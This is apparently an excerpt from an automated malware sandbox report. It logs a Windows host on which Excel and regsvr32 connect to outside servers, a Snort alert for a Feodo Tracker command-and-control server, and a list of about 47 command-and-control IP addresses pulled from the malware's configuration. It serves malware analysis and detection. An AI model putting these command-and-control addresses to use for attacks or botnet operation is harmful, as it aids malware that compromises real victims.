Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 163.172.115.127:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: global traffic TCP traffic: 47.92.133.65:80 -> 192.168.2.22:49177
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49172 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 163.172.115.127:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49175 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49176 -> 163.172.108.69:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49178 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 218.38.121.17:443
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 163.172.115.127:80
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 163.172.108.69:80
Source: global traffic TCP traffic: 192.168.2.22:49177 -> 47.92.133.65:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 32MB

Networking

barindex
Source: C:\Windows\System32\regsvr32.exe Network Connect: 218.38.121.17 443 Jump to behavior
Source: Traffic Snort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49178 -> 218.38.121.17:443
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE DNS query: sat7ate.com is down
Source: Malware configuration extractor IPs: 218.38.121.17:443
Source: Malware configuration extractor IPs: 186.250.48.5:443
Source: Malware configuration extractor IPs: 80.211.107.116:8080
Source: Malware configuration extractor IPs: 174.138.33.49:7080
Source: Malware configuration extractor IPs: 165.22.254.236:8080
Source: Malware configuration extractor IPs: 185.148.169.10:8080
Source: Malware configuration extractor IPs: 62.171.178.147:8080
Source: Malware configuration extractor IPs: 128.199.217.206:443
Source: Malware configuration extractor IPs: 210.57.209.142:8080
Source: Malware configuration extractor IPs: 36.67.23.59:443
Source: Malware configuration extractor IPs: 160.16.143.191:8080
Source: Malware configuration extractor IPs: 128.199.242.164:8080
Source: Malware configuration extractor IPs: 178.238.225.252:8080
Source: Malware configuration extractor IPs: 118.98.72.86:443
Source: Malware configuration extractor IPs: 202.134.4.210:7080
Source: Malware configuration extractor IPs: 82.98.180.154:7080
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 64.227.55.231:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 103.254.12.236:7080
Source: Malware configuration extractor IPs: 103.85.95.4:8080
Source: Malware configuration extractor IPs: 178.62.112.199:8080
Source: Malware configuration extractor IPs: 83.229.80.93:8080
Source: Malware configuration extractor IPs: 114.79.130.68:443
Source: Malware configuration extractor IPs: 51.75.33.122:443
Source: Malware configuration extractor IPs: 139.196.72.155:8080
Source: Malware configuration extractor IPs: 188.165.79.151:443
Source: Malware configuration extractor IPs: 190.145.8.4:443
Source: Malware configuration extractor IPs: 196.44.98.190:8080
Source: Malware configuration extractor IPs: 198.199.70.22:8080
Source: Malware configuration extractor IPs: 103.56.149.105:8080
Source: Malware configuration extractor IPs: 104.244.79.94:443
Source: Malware configuration extractor IPs: 87.106.97.83:7080
Source: Malware configuration extractor IPs: 103.71.99.57:8080
Source: Malware configuration extractor IPs: 46.101.98.60:8080
Source: Malware configuration extractor IPs: 103.126.216.86:443
Source: Malware configuration extractor IPs: 103.224.241.74:8080
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 202.28.34.99:8080
Source: Malware configuration extractor IPs: 175.126.176.79:8080
Source: Malware configuration extractor IPs: 85.25.120.45:8080
Source: Malware configuration extractor IPs: 93.104.209.107:8080
Source: Malware configuration extractor IPs: 103.41.204.169:8080
Source: Malware configuration extractor IPs: 78.47.204.80:443
Source: Malware configuration extractor IPs: 139.59.80.108:8080
